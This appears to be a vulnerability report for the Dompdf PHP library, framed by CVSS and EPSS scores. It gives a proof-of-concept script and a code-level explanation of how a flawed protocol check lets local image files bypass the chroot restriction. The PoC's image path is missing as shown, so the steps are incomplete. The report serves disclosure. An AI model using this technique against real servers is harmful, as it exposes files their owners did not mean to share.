5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
29.2%
The Scenario 3 you described in this report (https://huntr.dev/bounties/0bdddc12-ff67-4815-ab9f-6011a974f48e/) actually opens up the ability to bypass chroot checks.
1: Make sure you install Dompdf from GitHub (https://github.com/dompdf/dompdf/) and include the following autoload.inc.php
in dompdf/autoload.inc.php:
<?php
/**
* @package dompdf
* @link http://dompdf.github.com/
* @author Benj Carson <benjcarson@digitaljunkies.ca>
* @author Fabien MΓ©nager <fabien.menager@gmail.com>
* @license http://www.gnu.org/copyleft/lesser.html GNU Lesser General Public License
*/
// HMLT5 Parser
require_once __DIR__ . '/lib/html5lib/Parser.php';
// Sabberworm
spl_autoload_register(function($class)
{
if (strpos($class, 'Sabberworm') !== false) {
$file = str_replace('\\', DIRECTORY_SEPARATOR, $class);
$file = realpath(__DIR__ . '/lib/php-css-parser/lib/' . (empty($file) ? '' : DIRECTORY_SEPARATOR) . $file . '.php');
if (file_exists($file)) {
require_once $file;
return true;
}
}
return false;
});
// php-font-lib
require_once __DIR__ . '/lib/php-font-lib/src/FontLib/Autoloader.php';
//php-svg-lib
require_once __DIR__ . '/lib/php-svg-lib/src/autoload.php';
/*
* New PHP 5.3.0 namespaced autoloader
*/
require_once __DIR__ . '/src/Autoloader.php';
Dompdf\Autoloader::register();
2: With a sample image file cat.jpg in /var/www/html/cat.jpg, (find any photo will do):
3: Create vuln2.php:
<?php
// Include autoloader
require_once 'dompdf/autoload.inc.php';
// Reference the Dompdf namespace
use Dompdf\Dompdf;
use Dompdf\Options;
$options = new Options();
$options->set('isRemoteEnabled', true);
$dompdf = new Dompdf($options);
// Load HTML content
$dompdf->loadHtml('<base href="http://example.com"><img src />');
// (Optional) Setup the paper size and orientation
$dompdf->setPaper('A4', 'landscape');
// Render the HTML as PDF
$dompdf->render();
// Output the generated PDF to Browser
$dompdf->stream();
?>
If you visit the above in the browser you should see cat.jpg image being included into the PDF file even though chroot option is not set.
This vulnerability is capable of bypassing chroot checks essentially leading to disclosure of png and jpeg files. This was tested with allow_url_fopen and on Linux. Additionally, this was tested on a fresh install of dompdf.
This bug occurs because in Line 68:
$remote = ($protocol && $protocol !== "file://") || ($parsed_url['protocol'] != "");
($protocol && $protocol !== "file://") => True ( http:// !== file:// )
Therefore, the file:///var/www/html/cat.jpg will be treated as a remote file without the need for chroot checks.
5.3 Medium
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
NONE
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.001 Low
EPSS
Percentile
29.2%